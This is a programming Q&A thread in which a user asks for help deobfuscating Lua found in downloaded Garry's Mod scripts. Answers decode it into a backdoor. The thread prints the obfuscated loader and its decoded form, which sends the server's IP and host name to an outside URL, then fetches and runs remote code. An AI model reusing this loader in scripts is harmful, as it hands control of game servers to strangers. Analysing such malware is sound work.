# Decode obfuscated lua

Tags: lua, deobfuscation, garrys-mod

I recently downloaded some lua scripts and discovered this obfuscated code within. After a good many hours I failed to discover how to deobfuscate it and was looking for some help.

In terms of what I have tried already, I noticed the number's just convert to characters which reveals a few functions. However it would appear that the variables assigned at the top are not assigned to anything or maybe some special `unicode` character which is invisible in my editor (atom).

Here is the obfuscated code:

```lua
local ‪ = _G
local ‪‪ = ‪['\115\116\114\105\110\103']
local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114']
local function ‪‪‪‪‪‪‪(‪‪‪‪)
  if ‪‪['\108\101\110'](‪‪‪‪) == 0 then
    return ‪‪‪‪
  end
  local ‪‪‪‪‪ = ''
  for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪, '\46\46') do ‪‪‪‪‪
    = ‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_, 16), 53))
  end
  return ‪‪‪‪‪
end ‪
[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,
  function ()‪
    [‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'655a4641'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45', {[‪‪‪‪‪‪‪'56'] = ‪[‪‪‪‪‪‪‪'52585a51'][‪‪‪‪‪‪‪'72504172545850585a5150']()[‪‪‪‪‪‪‪'7b545850'], [‪‪‪‪‪‪‪'50'] = ‪[‪‪‪‪‪‪‪'52545850'][‪‪‪‪‪‪‪'7250417c6574515147504646'](), [‪‪‪‪‪‪‪'51'] = ‪[‪‪‪‪‪‪‪'7250417d5a46417b545850']()})
  end )
‪[‪‪‪‪‪‪‪'415c585047'][‪‪‪‪‪‪‪'665c58455950'](5,
  function ()‪
    [‪‪‪‪‪‪‪'5d414145'][‪‪‪‪‪‪‪'735041565d'](‪‪‪‪‪‪‪'5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',
  function (‪‪return)
    ‪[‪‪‪‪‪‪‪'67405b6641475c5b52'](‪‪return)
  end, nil )
end )
```

Comment: Change encoding in editor to pure ASCII. Turn on visibility of all characters. Replace function/variable names with something more readable. Global table is accessed several times. The first function is used to decode all those strings to actual keys when accessing `_G`. Analyze this function; decode all strings and you are pretty much good to go.

Comment: Just replace `U+202A` with some visible character (for example, `x`) in the whole text

Answer (score 2, accepted):

Old Lua (and modern LuaJIT) allows using arbitrary non-ASCII bytes (above 0x7F) in identifiers.
Nice feature for obfuscation! :-)

```
timer.Simple(
   5,
   function ()
      http.Post(
         "https://chainlose.000webhostapp.com/svlog/tracker.php", 
         {
            c = gmod.GetGamemode().Name, 
            e = game.GetIPAddress(), 
            d = GetHostName()
         }
      )
   end 
)
timer.Simple(
   5,
   function ()
      http.Fetch(
         "https://chainlose.000webhostapp.com/gas.lua",
         function (str)
            RunString(str)
         end, 
         nil 
      )
   end 
)
```